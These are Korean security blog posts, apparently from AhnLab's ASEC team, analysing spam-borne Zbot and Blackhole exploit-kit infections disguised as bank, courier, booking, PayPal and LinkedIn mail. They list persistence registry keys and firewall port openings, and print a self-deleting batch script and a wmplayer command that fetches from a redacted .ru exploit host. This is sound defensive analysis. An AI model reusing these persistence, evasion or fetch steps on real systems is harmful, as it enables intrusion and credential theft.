최근 과속 범칙금 메일을 위장하여 유포되는 악성코드가 발견되었다. 국내 거주하는 사용자들에게는 위험성이 다소 낮지만 유포되는 악성코드가 최근 해외 금융 사 등의 메일로 배포되는 악성코드와 유사한 악성코드로 사용자들의 주의가 요구된다. 본문 내용은 다음과 같다.

 

 

[그림 1] 과속 범칙금 메일로 위장한 메일 본문

 

위의 내용을 보면 메일에 첨부된 파일을 실행하도록 유도하는 내용을 확인할 수 있으며, 메일에 첨부된 파일은 아래와 같다.

[그림 2] 첨부된 악성코드

 

해당 파일을 실행하면 아래와 같은 자신의 파일을 복제하여 방화벽을 우회하고, 자동으로 실행 될 수 있도록 레지스트리에 특정 값을 등록한다. 특히, 자신의 파일을 복제할 때는 5자리 임의의 폴더 및 파일 이름으로 복제하며 악성코드 감염 시, 생성되는 배치파일은 자신의 파일을 스스로 삭제하여 흔적을 감추는 기능을 한다.

 

[파일 생성]

C:\Documents and Settings\Administrator\Application Data\Tejif\saado.exe

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpab59ca6c.bat

[레지스트리 등록]

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\{07B002BD-02AB-AD7F-31B7-BBCB31C598D9}

HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications

HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\27641:UDP

 

1) 악성코드 파일을 시작 프로그램 등록

2) explorer.exe 프로세스에 대해 방화벽 예외 설정 정책 설정

3) UDP를 사용하는 27641 포트 개방

4) TCP를 사용하는 24266 포트 개방

 

추가로 Address Book 폴더에 있는 Administrator.wab 파일은 Microsoft Windows 의 사용자 주소록과 관련된 파일로 악성코드 실행 시, Administrator.wab 파일에 접근하는 로그도 확인된다. 이는 해당 악성코드가 봇 기능 외에도 사용자들의 연락처 정보를 이용하는 것을 알 수 있다.

 

[악성코드가 접근하는 파일 경로]

C:\Documents and Settings\Administrator\Application Data\Microsoft\Address Book\Administrator.wab

    

[그림 3] Administrator.wab 파일

 

 

또한 아래 그림과 같이 네트워크 연결정보도 확인된다.

 

[그림 4] 악성코드 감염 시 네트워크 연결 정보

 

위의 악성코드의 경우, 지속적으로 발견되고 있는 메일 위장 악성코드와 같은 류의 악성코드로 발신인이 명확하지 않은 이메일, 그리고 의심스러운 링크가 포함되어 있거나 특정 파일을 실행하도록 유도하는 이메일에 대해서 각별히 주의한다면 감염을 방지할 수 있다.

 

 

해당 악성코드는 V3 제품을 통해 진단 및 치료가 가능하다.

 

<V3 제품군의 진단명>

 

Trojan/Win32.Zbot


신고
Posted by DH, L@@

 

 금융사 계정 정보로 위장하여 악성코드를 유포하는 스팸메일이 확산되어 사용자들의 주의가 필요하다. 이 스팸메일은 아래와 같이 chase사의 사용자 계정 정보와 관련된 내용이지만 Zbot 악성코드가 압축 파일의 형태로 첨부되어 있다.

[그림 1] 금융사 정보로 위장한 스팸메일

압축 해제된 파일을 실행하면 C:\Documents and Settings\ahnmaru78\Application Data 폴더에 랜덤한 폴더를 생성한 후 자신을 복사한 후 실행하여 감염시킨다.

또한, 복사한 파일이 부팅 시 실행되도록 레지스트리의 아래 경로에 자신을 등록한다.

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\{E55555F5-9C43-AD7D-DE5D-26A4FBAA05B6}

 

그리고 아래와 같이 특정 포트를 방화벽에서 허용하여 안전하게 통신을 할 수 있도록 설정한다.

HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\14202:UDP "14202:UDP:*:Enabled:UDP 14202"

HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\17000:TCP "17000:TCP:*:Enabled:TCP 17000"

 

감염이 완료된 후 악성코드는 다수의 C&C서버로 보이는 IP들에게 데이터를 전송하고 받아오는 등 통신 과정을 반복하고 아래 웹 사이트에서 추가로 악성파일을 다운로드 하여 감염시킨다.

* http:// a*********.co.za/pon(2).exe

[그림 2] 악성파일 다운로드

 

추가 감염된 악성코드는 PC에 저장된 다양한 사용자 정보를 수집할 목적으로 제작되었다.

이러한 악성코드의 특성상 사용자의 민감한 정보가 유출되는 등 추가 피해를 당할 가능성이 있으므로 주의가 필요하다.

[그림 3] 악성코드가 수집하는 프로그램 관련 정보

 

악성 메일에 대한 감염 피해를 예방하기 위한 방안으로 백신 프로그램을 사용하는 것은 사용자에게 많은 도움이 된다. 이메일 악성코드의 경우 변형이 발생한 것을 여러 보안 회사들이 쉽게 인지할 수 있고 대부분 신속하게 진단기능을 업데이트하기 때문이다.

그러나 악성코드 제작자들도 새로운 변형 악성코드를 제작할 때 보안 제품에서 탐지되지 않는 형태로 만들어내기 때문에 악성코드의 유포 초기에는 보안 제품을 사용하고 있다 하더라도 탐지되지 않는 경우가 있다. 따라서 이러한 악성코드에 감염되지 않기 위해서는 출처가 불분명한 메일을 열어보지 않아야 하고 특히 이메일에 첨부된 파일은 꼭 필요한 경우가 아니면 실행하지 않는 것이 중요하다.

 

 

<V3 제품군의 진단명>

Trojan/Win32.Zbot

신고
Posted by DH, L@@

 

최근 Bank of America에서 보낸 것으로 위장하여 악성코드를 배포하는 스팸 메일이 발견 되어 사용자들의 주의가 요구된다. 이번에 발견 된 스팸메일은 "You transaction is completed" (당신의 계좌 이체는 성공하였습니다.)라는 제목을 사용하였으며, 본문 내용은 다음과 같다.

 

[그림 1] Bank of America로 위장한 스팸메일 본문

해당 스팸 메일은 "Receipt of payment is attached." (영수증은 첨부해드립니다.)라는 표현을 쓰면서 첨부 된 파일의 실행을 유도한다. 첨부 파일은 zip 파일로 되어 있으며, 내부에는 실행 파일 형태로 악성코드가 존재하기 때문에 주의가 필요하다.

 

또한 "This is an automatically generated email, please do not reply" (이 메일은 자동으로 생성되었으므로, 회신은 하지 말아주세요.)라는 표현을 이용하여, 진짜 알림 메일처럼 회신 금지 메시지를 표시하고 있다. 해당 스팸메일의 발신인은 inco********aw3@gmail.com이라는 구글 gmail 계정을 사용하는 것으로 파악된다.

 

첨부 파일은 "PAYMENT RECEIPT 24-04-2013-GBK-75.zip"라는 이름을 사용하며, zip 압축 파일이다. 해당 첨부파일을 다운로드 하여 압축을 풀면, 아래와 같이 실행 파일이 생성된다. 실행 파일이지만, 아이콘을 PDF 파일과 유사하게 만들어 사용자를 혼동시킨다. 그리고 파일 설명에 무작위 한 문자열이 사용하였다. 게다가 영수증을 실행 파일로 보낼 이유가 없다. 이러한 점으로 악성코드일 것으로 의심할 수 있다.

 

[그림 2] 압축 해제 시 생성되는 실행 파일

그리고 해당 파일의 버전 정보를 확인해보면, 아래와 같이 어떠한 내용도 확인할 수 없다. 이러한 점도 첨부된 실행 파일이 악성코드일 것이라는 의심을 가능하게 한다.

 

[그림 3] 버전 정보를 확인할 수 없는 첨부 파일

해당 파일을 실행하면 아래와 같은 파일이 생성되어 방화벽을 우회하고, 자동으로 실행 될 수 있도록 레지스트리에 특정 값을 등록한다. 또한, 악성코드 감염이 완료되면 최초 실행된 첨부파일은 자신을 스스로 삭제하여 흔적을 감춘다.

 

[파일 생성]

C:\Documents and Settings\Administrator\Application Data\Uptyec\ityv.exe

 

[레지스트리 설정]

[그림 4] 레지스트리 등록 항목

1) 악성코드 파일을 시작 프로그램 등록

2) explorer.exe 프로세스에 대해 방화벽 예외 설정 정책 설정

3) UDP를 사용하는 11046 포트 개방

4) TCP를 사용하는 18253 포트 개방

 

추후 접속하여 PC를 제어하기 위해서 방화벽에 예외를 설정하고 포트를 개방해 놓는다. 일종의 봇(Bot)으로 감염된 상태에서 아래와 같이 원격의 시스템으로 연결을 시도한다.

 

[그림 5] 악성코드 감염 시 특정 URL로 접속 시도

이번에 발견된 악성코드의 경우, 방화벽 설정을 변경하여 특정 포트를 개방하기 때문에 감염되지 않는 것이 가장 중요하다. 따라서 발신인이 명확하지 않은 이메일, 그리고 의심스러운 링크가 포함되어 있거나 특정 파일을 실행하도록 유도하는 이메일에 대해서는 각별한 주의가 필요하다. 함부로 링크를 클릭하거나, 첨부파일을 실행하지 않는 것이 중요하며, 특히 영문으로 된 이메일 인 경우에는 자신에게 해당되는 내용의 메일인지, 아니면 스팸으로 발송 된 메시지인지 구별하여 열람하는 것이 중요하다.

 

<V3 제품군의 진단명>

Trojan/Win32.Zbot


신고
Posted by DH, L@@

 

 UPS에서 발송한 화물 배송조회 메일로 위장한 악성 스팸 메일이 발견되었다. 이 메일은 발신자 주소를 임의의 메일 계정으로 하여, 악성 html 파일을 첨부한 상태로 불특정 다수에게 배포한 것으로 보인다.

 

[그림 1] 스팸 메일에 첨부 된 html 파일

html 파일의 링크를 클릭하면 실제 악성코드를 유포하는 사이트로 접속한다. 악성코드 유포 사이트에서 아래와 같이 플러그인 설치 여부를 묻는 창을 보여주고, 설치를 허용하면 악성코드 파일을 다운로드 한다.

 

[그림 2] 악성코드를 유포하는 웹 사이트

 

첨부된 파일을 실행하면 아래와 같은 파일들이 생성되며, 레지스트리에 실행 파일을 등록하여 부팅 시 자동으로 실행되도록 한다. 또한 방화벽의 허용 대상 프로그램에 자신을 등록하여, C&C 서버와 통신이 PC 보안설정에 의해 차단되는 것을 방지한다. 그리고 폴더 옵션을 변경하여 윈도우 탐색기에서 보이지 않도록 설정한다.

 

[파일 생성]

C:\Documents and Settings\[login user]\Application Data\[랜덤폴더]\[랜덤파일명].exe

C:\Documents and Settings\[login user]\Local Settings\Temp\4.tmp\msupdate.exe

C:\Documents and Settings\[login user]\Local Settings\Temp\4.tmp\PsExec.exe

 

생성되는 파일 중에서 PsExec.exe 파일은 MS에서 제공하는 보안 도구로, 동작하고 있는 시스템에 대해서 원격에서 명령 수행이 가능하도록 해주는 기능이 있기 때문에 설치되면 추가적인 보안 사고가 발생할 위험성이 있다. 이 툴에 대한 자세한 정보는 아래 사이트에서 확인할 수 있다.

 

- http://technet.microsoft.com/ko-KR/sysinternals/bb897553.aspx

 

원격으로 명령을 수행해주는 프로그램이 설치되는 경우는 악성코드가 설치 된 것 보다 더 큰 문제가 될 수 있다. Anti-Virus와 같은 보안 제품들이 악성코드로 분류하지 않기 때문에, 악성코드가 제거된 이후에도 악성코드 제작자들에 의해 얼마든지 장악될 가능성이 높다. 이번 사례에서 다룬 악성코드의 유포자 또한 PC의 로그인 계정 정보와 같은 민감한 데이터를 이미 파악하고 있을 가능성이 높고, 악성코드 제작자에 의해 좀비PC로써 활용될 위험성이 있다. 뿐만 아니라 타인을 공격하는 등 범죄의 수단으로 악용 될 수 있는 문제도 있다. 아래 그림은 감염된 시스템에서 불특정 다수에게 이메일을 발송하는 시점의 패킷을 캡쳐한 것이다.

 

[그림 3] 감염된 PC에서 악성 메일 발송

 

외부에서 정보를 받아오거나, PC에 설치되어 있는 아웃룩의 주소록이나 편지함 등 이메일 주소를 추출할 수 있는 곳의 정보를 이용하여 메일을 수신하는 대상을 선정한다. 이와 같은 메일 발송 기능은 악성코드에 감염되었을 때 항상 발생하는 증상은 아니다. 또한 메일이 발송 되더라도 인지하지 못하는 경우가 대부분이다. 그러나 회사의 네트워크가 느려지거나 불특정 다수에게 악성코드가 포함 된 스팸 메일을 발송하여, 추가 피해를 발생시키는 등의 여러 부작용이 있으므로 감염되지 않기 위한 사용자의 주의가 필요하다.

 

<V3 제품군의 진단명>

Win-Trojan/Agent.238080.AS 

Win-Trojan/Agent.278016.AD 

Trojan/Win32.VBKtypt 

 

 

신고
Posted by DH, L@@

 

 한국의 우정사업본부와 유사한 기관인 미국우편공사(United States Postal Service)로 위장한 악성 스팸 메일이 발견되었다. USPS에서 발송한 것처럼 위장하기 위해 송신자의 주소를 'reports@usps.com'와 같이 USPS의 도메인을 사칭하였고, 수신자가 메일에 첨부된 악성코드를 실행하도록 유도한다. 메일 제목은 'USPS delivery failure report'를 사용하였으며, 수신된 메일의 본문은 첨부된 파일(LABEL-ID-56723547-GFK72.zip)을 출력하도록 안내하여 첨부파일의 실행을 유도한다.

 

 

[메일 본문]

 

Notification

 

Our company's courier couldn't make the delivery of package.

REASON: Postal code contains an error.

LOCATION OF YOUR PARCEL: New York

DELIVERY STATUS: sort order

SERVICE: One-day Shipping

NUMBER OF YOUR PARCEL: 5D61MZ1F2X

FEATURES: No

Label is enclosed to the letter.

Print a label and show it at your post office.

An additional information:

If the parcel isn't received within 30 working days our company will have the right to claim compensation from you for it's keeping in the amount of $8.26 for each day of keeping of it.

You can find the information about the procedure and conditions of parcels keeping in the nearest office.

Thank you for using our services.

 

USPS Global.

 

첨부된 파일을 실행하면 아래와 같은 파일들이 생성된다.

 

[파일 생성]

C:\Documents and Settings\Administrator\Application Data\Akta\ixyzs.exe

 

그리고 레지스트리에 특정 값을 등록하여, 방화벽을 우회하고 부팅 시 자동으로 실행될 수 있도록 한다.

 

[레지스트리 등록]

[그림 1] 레지스트리에 등록되는 악성코드 관련 기능

 

그리고 악성코드 감염이 완료되면 자신을 삭제하여 흔적을 제거한다.

 

[흔적 제거를 위한 배치파일]

 

@echo off

:d

del "C:\Documents and Settings\Administrator\Desktop\LABEL-ID-56753547-GFK72.exe"

if exist "C:\Documents and Settings\Administrator\Desktop\LABEL-ID-56753547-GFK72.exe" goto d

del /F "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeeade0cd.bat"

 

악성코드에 감염되면 독일에 위치한 것으로 확인되는 원격의 시스템에 연결을 반복하여 시도한다.

 

[그림 2] 지속적으로 접속을 시도하는 악성코드

 악성 스팸 메일 중에서 운송 업체를 사칭하는 악성 스팸 메일의 비중이 높은 편이다. 특히 운송 업체를 사칭하는 방법은 오래되었으며 동일한 방법으로 꾸준히 지속되고 있다. 그 것은 피해사례가 여전히 발생하고 있다는 것을 의미한다. 따라서 발신인이 명확하지 않거나 파일이나 본문에 링크가 삽입된 메일에 대해서는 사용자의 각별한 주의가 필요하다.

 

<V3 제품군의 진단명>

Win-Trojan/Agent.297984.AW


신고
Posted by DH, L@@

연말에 휴가를 계획중이라면 예약 관련 내용의 메일을 확인할 경우 주의가 필요하다.

 

전 세계 26만여개의 숙박업체 예약 서비스를 하고 있는 Booking.com(부킹닷컴)을 사칭한 메일을 통해 악성코드가 유포되고 있다.

[그림 1] 부킹닷컴을 사칭한 악성코드 첨부 메일 원본

 

이러한 스팸 메일은 지난 7월에도 보고된 바 있고, 10월에는 시스코사의 위협 발생 경보에 아래와 같은 허위 호텔 예약 확인이라는 이메일 내용이 공개된 적이 있다.

 

 

 

 

 

[그림 2] Cisco - Threat Outbreak Alerts: Fake Hotel Reservation Confirmation E-mail Messages

 

해당 악성코드는 사회공학적 기법을 이용하여 휴가시즌에 주로 메일을 통해 유포되고 있으며, 메일 본문에는 예약 내용 확인을 위해 첨부 파일 실행을 유도하고 있다.

 

메일에 첨부된 압축 파일을 해제하면 Booking Summary Details.pdf.exe 파일을 확인할 수 있다. 해당 파일을 실행하면 자기 복제 본을 svchost.exe 파일 이름으로 아래와 같이 생성하고 레지스트리 값에 등록하여 부팅 시 자동 실행되도록 한다.

 

[파일 생성]

%ALLUSERSPROFILE%\svchost.exe

 

[레지스트리 등록]

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]

"SunJavaUpdateSched"="%ALLUSERSPROFILE%\svchost.exe"

 

svchost.exe 파일이 실행되면 아래 그림과 같이 TCP 8000 포트를 오픈 하여 대기 상태인 것을 확인할 수 있다.

 

[그림 2] svchost.exe의 네트워크 연결 정보

 

V3 제품에서는 아래와 같이 진단이 가능하다.

 

<V3 제품군의 진단명>

Win-Trojan/Jorik.38400.F

신고
Posted by DH, L@@

ASEC에서는 2009년부터 익스플로잇 툴킷(Web Exploit Toolkit)이라는 웹을 기반으로 하여 웹 브라우저(Web Browser)나 웹 기반 애플리케이션(Web Application)들에 존재하는 취약점들을 자동으로 악용하도록 제작된 툴킷의 위험성에 대해 언급하였다.


그리고 웹 익스플로잇 투킷의 한 종류인 블랙홀(Blackhole) 웹 익스플로잇 툴킷을 이용하여 실제 사회적 주요 이슈나 소셜 네트워크(Social Network)와 같은 일반 사람들이 관심을 가질 만한 내용들을 포함한 스팸 메일(Spam Mail)의 사회 공학(Social Engineering) 기법으로 악성코드 유포를 시도한 사례들이 다수 존재한다.


2012년 6월 - 스팸 메일과 결합된 웹 익스플로잇 툴킷


2012년 7월 - 링크드인 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷


2012년 8월 - 페이팔 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷


특히 올해 2012년 4분기에는 미국과 한국에는 대통령 선거라는 정치적인 중요한 이슈가 존재하다. 이러한 중요한 이슈를 악용하여 스팸 메일에 존재하는 악의적인 웹 사이트 링크로 유도하는 사례가 발견되었다.


이 번에 발견된 스팸 메일 사례에는 아래 이미지와 같이 미국 대통령 선거의 후보 중 한 명인 미트 롬니(Mitt Romney)가 60% 차이로 앞서고 있다는 허위 사실을 포함하여, 하단에 존재하는 웹 사이트 링크를 클릭하도록 유도하고 있다.



해당 링크를 클릭하게 될 경우에는 블랙홀 웹 익스플로잇 툴킷의 악의적인 웹 사이트로 연결되도록 설정되어 있어, 사용하는 시스템에 웹 브러우저와 웹 애플리케이션에 취약점이 존재 할 경우에는 이를 악용하여 다른 악성코드의 감염을 시도하게 된다.


이 번에 발견된 미국 대통령 선거 뉴스로 위장한 스팸 메일을 통해 유포된 악성코드들은 V3 제품 군에서 다음과 같이 진단한다. 


PDF/Exploit

Java/Cve-2012-1723

Trojan/Win32.Pakes 


현재 웹 익스플로잇 툴킷을 이용하여 다양한 악성코드를 유포 중에 있음으로 각별한 주의가 필요하다. 그리고 향후에도 미국과 한국의 대통령 선거와 관련된 사회적 중요 이슈들을 악용한 보안 위협이 발생할 가능성이 높음으로 주의가 필요하다.

저작자 표시 비영리 변경 금지
신고
Posted by 비회원

최근 들어 웹 익스플로잇 툴킷(Web Exploit Toolkit)의 일종인 블랙홀(Blackhole) 웹 익스플로잇 툴킷이 스팸 메일(Spam Mail)과 결합되어 유포되는 현상들이 자주 발견되고 있다.


최근 발견된 블랙홀 웹 익스플로잇 툴킷과 스팸 메일이 결합되어 유포된 사례들은 다음을 들 수가 있다.


2012년 6월 - 스팸 메일과 결합된 웹 익스플로잇 툴킷


2012년 7월 - 링크드인 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷


금일 블랙홀 웹 익스플로잇 툴 킷과 결합된 스팸 메일이 다시 발견되었으며, 이 번에 발견된 스팸 메일은 인터넷을 이용한 현금 결제 서비스인 페이팔(PayPal)의 결제 결과 안내 메일로 위장하여 유포되었다.


이 번에 발견된 페이팔 스팸 메일과 결합된 형태로 유포된 블랙홀 웹 익스플로잇 툴킷은 아래 이미지와 같이 다양한 취약점들을 악용하고 있으며 최종적으로 감염된 PC에서 사용자 정보들을 탈취하기 위한 악성코드 감염을 목적으로 하고 있다.



페이팔 결제 안내 메일로 위장해 유포된 스팸 메일은 아래 이미지와 같은 형태를 가지고 있으며, [Accept] 부분은 정상적인 페이팔 웹 페이지로 연결되는 것이 아니라 미국에 위치한 특정 시스템으로 연결되도록 구성되어 있다.



해당 [Accept] 부분을 클릭하게 되면 미국에 위치한 특정 시스템으로 접속하며, PC 사용자에게는 아래와 같은 이미지를 보여주게 된다.



그러나 실제 해당 웹 페이지 하단에는 아래 이미지와 같이 다른 말레이시아에 위치한 시스템으로 연결되는 자바 스크립트 코드가 인코딩 되어 있다.



해당 자바 스크립트 코드를 디코딩하게 되면 기존 블랙홀 익스플로잇 툴킷과 동일한 포맷의 iFrame 으로 처리된 코드가 나타나며, 사용자 모르게 말레이시아에 위치한 블랙홀 웹 익스플로잇 툴킷이 설치되어 있는 시스템으로 연결하게 된다.


그리고 해당 블랙홀 익스플로잇 툴킷에서는 아래의 취약점들 중 하나를 악용하게 된다.



해당 취약점이 성공적으로 악용되면 동일한 시스템에 존재하는 64b3bcf.exe (84,480 바이트)를 다운로드하여 wpbt0.dll (84,480 바이트) 명칭으로 생성하게 된다.


C:\Documents and Settings\[사용자 계정]\Local Settings\Temp\wpbt0.dll


그리고 생성된 wpbt0.dll (84,480 바이트) 는 다시 자신의 복사본을 아래 경로에 KB01458289.exe   (84,480 바이트) 명칭으로 복사하게 된다.


C:\Documents and Settings\[사용자 계정]\Application Data\KB01458289.exe


감염된 PC의 레지스트리에 다음 키 값을 생성하여 PC가 재부팅 할 때마다 자동 실행 되도록 구성하였다.


HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\

KB01458289.exe = C:\Documents and Settings\[사용자 계정]\Application Data\KB01458289.exe


그리고 감염된 PC에서 실행 중인 explorer.exe 정상 프로세스의 스레드로 자신의 코드를 삽입한 후 다음의 정보들을 후킹하게 된다.

웹 사이트 접속 정보
FTP 시스템 접속 사용자 계정과 비밀 번호 정보
POP3 이용 프로그램 사용자 계정과 비밀 번호 정보
웹 폼 변조(Formgrabber) 및 웹 폼 인젝션 (httpinjects)으로 웹 사이트 사용자 계정과 암호 정보

마지막으로 감염된 PC 사용자에게는 구글 메인 웹 페이지로 연결하여 정상적인 접속이 실패한 것으로 위장하게 된다.

이 번에 발견된 페이팔 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷에서 유포한 악성코드들은 V3 제품군에서 모두 다음과 같이 진단한다.

JS/Iframe
JS/Redirect
PDF/Cve-2010-0188
Win-Trojan/Agent.84480.HA

페이팔 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷에서 유포를 시도한 악성코드는 기존에 발견된 온라인 뱅킹 정보 탈취를 목적으로하는 제우스(Zeus) 또는 스파이아이(SpyEye)와 유사한 웹 폼 변조(Formgrabber) 및 웹 폼 인젝션 (httpinjects) 기능으로 웹 사이트 사용자 계정과 암호 정보를 탈취 할 수 있다.

이는 악성코드 유포자가 의도하는 대부분의 웹 사이트들에서 사용자 계정과 비밀 번호 정보를 탈취 할 수 있음으로, 단순 스팸 메일로 판단되더라도 송신자가 불명확한 메일에 포함된 웹 사이트 연결 링크를 클릭하지 않는 주의가 필요하다.

저작자 표시 비영리 변경 금지
신고
Posted by 비회원

ASEC에서는 6월 5일 웹 익스플로잇 툴킷(Web Exploit Toolkit)의 일종인 블랙홀(Blackhole) 웹 익스플로잇 툴 킷이 스팸 메일(Spam Mail)과 결합되어 유포되었다는 사실을 밝힌 바가 있다.


금일 블랙홀 웹 익스플로잇 툴 킷과 결합된 스팸 메일이 다시 발견되었으며, 이 번에 발견된 스팸 메일은 사용자가 많은 유명 소셜 네트워크(Social Network) 서비스인 링크드인(LinkedIn)의 초대 메일로 위장하여 유포되었다.


이 번에 발견된 링크드인 스팸 메일과 결합된 형태로 유포된 블랙홀 웹 익스플로잇 툴킷은 아래 이미지와 같이 다양한 취약점들을 악용하고 있으며 최종적으로 감염된 PC에서 사용자 정보들을 탈취하기 위한 악성코드 감염을 목적으로 하고 있다.



링크드인의 초대 메일로 위장해 유포된 스팸 메일은 아래 이미지와 같은 형태를 가지고 있으며, [Accept] 부분은 정상적인 링크드인 웹 페이지로 연결되는 것이 아니라 중국에 위치한 특정 시스템으로 연결되도록 구성되어 있다.



해당 [Accept] 부분을 클릭하게 되면 중국에 위치한 특정 시스템으로 접속하며, PC 사용자에게는 아래와 같은 이미지를 보여주게 된다.



그러나 실제 해당 웹 페이지 하단에는 아래 이미지와 같이 웹 페이지 하단에는 다른 러시아에 위치한 시스템으로 연결되는 자바 스크립트 코드가 인코딩 되어 있다.



해당 자바 스크립트 코드를 디코딩하게 되면 아래 이미지와 같이 iFrame 으로 처리된 코드가 나타나며, 사용자 모르게 러시아에 위치한 블랙홀 웹 익스플로잇 툴킷이 설치되어 있는 시스템으로 연결하게 된다.



해당 블랙홀 웹 익스플로잇 툴킷에 성공적으로 연결하게 되면 웹 브라우저에 의해 CMD 명령으로 윈도우 미디어 플레이(Windows Media Player) 취약점을 악용하기 위한 시도를 하게 된다. 그러나 분석 당시 해당 취약점은 정상적으로 악용되지 않았다.


"C:\Program Files\Windows Media Player\wmplayer.exe" /open http://************.ru:8080/forum/data/hcp_asx.php?f=182b5"


그리고 두 번째로 자바(JAVA)와 인터넷 익스플로러(Internet Explorer)에 존재하는 알려진 취약점을 악용하기 위한 스크립트 파일이 실행된다.



세 번째로 어도비 아크로뱃 리더(Adobe Acrobat Reader)에 존재하는 알려진 취약점을 악용하기 위한 PDF 파일을 아래 이미지와 같이 다운로드 후 실행 하게 된다.



해당 링크드인 스팸 메일을 수신한 PC에 위에서 언급한 4개의 취약점 중 하나라도 존재 할 경우에는 동일한 시스템에서 wpbt0.dll (127,648 바이트)를 다운로드하여 다음 경로에 생성하게 된다.


C:\Documents and Settings\Tester\Local Settings\Temp\wpbt0.dll


그리고 생성된 wpbt0.dll (127,648 바이트) 는 다시 자신의 복사본을 아래 경로에 KB01458289.exe (127,648 바이트)라를 명칭으로 복사하게 된다.


C:\Documents and Settings\Tester\Application Data\KB01458289.exe


감염된 PC의 레지스트리에 다음 키 값을 생성하여 PC가 재부팅 할 때마다 자동 실행 되도록 구성하였다.


HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\

KB01458289.exe = C:\Documents and Settings\Tester\Application Data\KB01458289.exe


그리고 감염된 PC에서 실행 중인 모든 정상 프로세스의 스레드로 자신의 코드 일부분을 삽입한 후 다음의 정보들을 후킹하게 된다.


웹 사이트 접속 정보

FTP 시스템 접속 사용자 계정과 비밀 번호 정보

POP3 이용 프로그램 사용자 계정과 비밀 번호 정보

웹 폼 변조(Formgrabber) 및 웹 폼 인젝션 (httpinjects)으로 웹 사이트 사용자 계정과 암호 정보


감염된 PC에서 수집된 정보들 모두는 아래 이미지와 같이 악성코드 내부에 하드코딩 되어 있는 특정 시스템들으로 후킹한 데이터들 전부를 인코딩하여 전송하게 된다.



그리고 마지막으로 감염된 PC 사용자에게는 아래 웹 페이지와 같이 연결을 시도한 웹 페이지를 보여주어 정상적인 접속이 실패한 것으로 위장하게 된다.



이 번에 발견된 링크드인 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷에서 유포한 악성코드들은 V3 제품군에서 모두 다음과 같이 진단한다.


JS/Iframe

Packed/Win32.Krap

PDF/Exploit
JS/Exploit

링크드인 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷에서 유포를 시도한 악성코드는 기존에 발견된 온라인 뱅킹 정보 탈취를 목적으로하는 제우스(Zeus) 또는 스파이아이(SpyEye)와 유사한 웹 폼 변조(Formgrabber) 및 웹 폼 인젝션 (httpinjects) 기능으로 웹 사이트 사용자 계정과 암호 정보를 탈취 할 수 있다.


이는 악성코드 유포자가 의도하는 대부분의 웹 사이트들에서 사용자 계정과 비밀 번호 정보를 탈취 할 수 있음으로, 단순 스팸 메일로 판단되더라도 송신자가 불명확한 메일에 포함된 웹 사이트 연결 링크를 클릭하지 않는 주의가 필요하다.

저작자 표시
신고
Posted by 비회원

안랩 ASEC에서 2012년 5월 국내,외에서 발생한 다양한 보안 위협 이슈와 동향들을 정리한 ASEC 리포트 2012 Vol.29을 발간하였다. 



이 번에 발간된 ASEC 리포트는 2012년 5월 주요 보안 위협 이슈들을 다음과 같이 분석하고 있다.


1) 악성코드 이슈

이력서로 위장한 악성코드

LinkedIn 스팸 메일을 위장한 악성코드 유포

DHL운송 메일로 위장한 악성코드

런던 올림픽 개최를 이용한 악성코드

ws2help.dll 파일을 패치하는 온라인게임핵 변종 악성코드

AV Kill 기능을 가진 온라인게임핵 악성코드

플래시 플레이어의 제로데이 취약점(CVE-2012-0779)을 이용하는 악성코드

Python으로 제작된 맥 악성코드

프로그램 설치 화면 놓치지 마세요

어린이날에도 쉬지 않는 악성코드 제작자


2) 모바일 악성코드 이슈

안드로이드 Notcompatible 악성코드 발견

어도비 플래시 플레이어로 위장한 안드로이드 악성 앱

허위 안드로이드 모바일 백신 유포

허위 유명 안드로이드 앱 배포 웹 사이트

Talking Tom Cat 사이트로 위장한 앱 사이트를 통해 유포되는 악성코드


3) 보안 이슈

어도비 플래시 플레이어 CVE-2012-0779 취약점 발견

'LOIC' 툴을 이용한 DDoS 공격 주의!


4) 웹 보안 이슈

꾸준히 발견되는 농협 피싱 사이트


ASEC에서 발간하는 월간 보안 위협 동향 리포트는 아래 웹 사이트에서 확인 할 수 있다. 


ASEC 보안 위협 동향 리포트 2012 Vol.29 발간


저작자 표시
신고
Posted by 비회원